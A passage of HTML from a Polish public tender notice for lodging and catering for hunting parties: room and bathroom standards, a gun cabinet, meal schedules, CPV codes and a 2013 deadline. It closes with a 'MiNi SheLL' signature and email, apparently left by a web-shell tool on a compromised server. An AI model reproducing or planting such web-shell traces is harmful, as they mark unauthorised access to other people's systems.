-	możliwość spożywania posiłków na miejscu zakwaterowania,
-	śniadanie składające się z:
-	dania ciepłe typu parówka, jajecznica lub inne podobne,
-	dania na zimno typu kanapki lub możliwość własnego zestawienia posiłku np. plastry szynki, kiełbasy, serów, chleb, masło itp.
-	obiad składający się z dwóch dań na ciepło:
1.	zupa np. pomidorowa, żurek,
2.	drugie danie składające się z mięsa, ryb, ziemniaki lub inne, surówka, napój, bądź też równoważny zestaw,
-	kolacja składająca się z:
1.	danie na ciepło jak w przypadku śniadania, lecz nie powtarzające się w tym samym dniu i w dniu następnym, zarówno na śniadanie jak i na kolacje,
2.	danie na zimno jak śniadanie;
-	możliwość o każdej porze dnia, szczególnie przed i po polowaniu spożycia kawy, herbaty lub zimnego napoju;
-	możliwość po wcześniejszym uzgodnieniu zorganizowania uroczystej obiadokolacji;
-	możliwość zmian i ustalania innych godzin posiłków,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przedmiotem zamówienia jest wykonanie usługi zakwaterowania i wyżywienia grup myśliwych i osób towarzyszących na polowaniach indywidualnych i zbiorowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Zakwaterowanie dotyczy ok. 60 szt. noclegów (osobodni) wraz ze śniadaniami oraz obiadami i kolacjami.
Zakwaterowanie myśliwych i osób towarzyszących na polowaniach indywidualnych w kwaterach w standardzie min. kat. I lub hotelu min. **, zgodnie z Rozporządzeniem Ministra  Gospodarki i Pracy z dnia 19 sierpnia 2004 r. w sprawie obiektów hotelarskich i innych obiektów, w których są świadczone usługi hotelarskie (Dz. U. z 2006 r., nr 22, poz. 169 z późn. zm.), z wyposażeniem minimum:
-	obiekt całoroczny, pokoje wyposażone w ogrzewanie,
-	kwatera musi mieć osobne wejście dla myśliwych i być oddzielona od miejsca stałego przebywania mieszkańców bądź też być zlokalizowana w osobnym budynku,
-	kwatera musi posiadać minimum 9 pokoi dwuosobowych,
-	powierzchnia pokoi nie może być mniejsza niż 12 m2,
-	pokoje z zestawem wyposażenia meblowego:
-	 łóżka jednoosobowe 
-	nocny stolik lub półka przy każdym miejscu spania wraz z lampką nocną,
-	biurko lub stół,
-	krzesło - krzesła lub inny mebel do siedzenia,
-	wieszak ścienny na wierzchnią odzież,
-	odbiornik TV.
-	kwatera ma być wyposażona w minimum 3 łazienki do wyłącznej dyspozycji myśliwych,
-	minimalne wyposażenie łazienki: umywalka z lustrem, kabina prysznicowa, muszla klozetowa,
-	instalacja sanitarna: ciepła i zimna woda przez całą dobę,
-	kwatera musi posiadać szafkę na broń (przynajmniej jedną przeznaczoną dla minimum 15 jednostek broni), zgodnie z rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 3.04.2000 r. w sprawie przechowywania, noszenia oraz ewidencjonowania broni i amunicji (Dz.U. nr 27 poz.343 z 2000 r.),
-	bezpłatny parking dla osób zakwaterowanych w kwaterze lub hotelu,
-	obiekt wyposażony w osobną salę do posiłków.
-	bar przeznaczony do dyspozycji myśliwych,

2)	wyżywienie:
a.	Śniadania mają być podawane w godz. od 7.00 do 10.00. 
b.	Zapewnienie dodatkowo 2 posiłków dziennie tj. obiadu i kolacji. W pierwszym dniu pobytu Wykonawca zapewni (w zależności od pory przybycia gości do kwatery) obiad i-lub kolację.
c.	Przez zapewnienie wyżywienia Zamawiający wymaga przygotowania oraz podania gościom ww. posiłków, tj. śniadania, obiadu i kolacji.
d.	Obiady będą podawane gościom w godzinach 12.00 - 16.00.
e.	Kolacje będą podawane gościom w godzinach 18.00 - 22.00.
f.	możliwość spożywania posiłków na miejscu zakwaterowania,
g.	śniadanie składające się z:
-	dania ciepłe typu parówka, jajecznica lub inne podobne,
-	dania na zimno typu kanapki lub możliwość własnego zestawienia posiłku np. plastry szynki, kiełbasy, serów, chleb, masło itp.
-	obiad składający się z dwóch dań na ciepło:
1.	zupa np. pomidorowa, żurek,
2.	drugie danie składające się z mięsa, ryb, ziemniaki lub inne, surówka, napój, bądź też równoważny zestaw,
-	kolacja składająca się z:
-	danie na ciepło jak w przypadku śniadania, lecz nie powtarzające się w tym samym dniu i w dniu następnym, zarówno na śniadanie jak i na kolacje,
-	danie na zimno jak śniadanie;
-	możliwość o każdej porze dnia, szczególnie przed i po polowaniu spożycia kawy, herbaty lub zimnego napoju;
-	możliwość po wcześniejszym uzgodnieniu zorganizowania uroczystej obiadokolacji;
-możliwość zmian i ustalania innych godzin posiłków,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com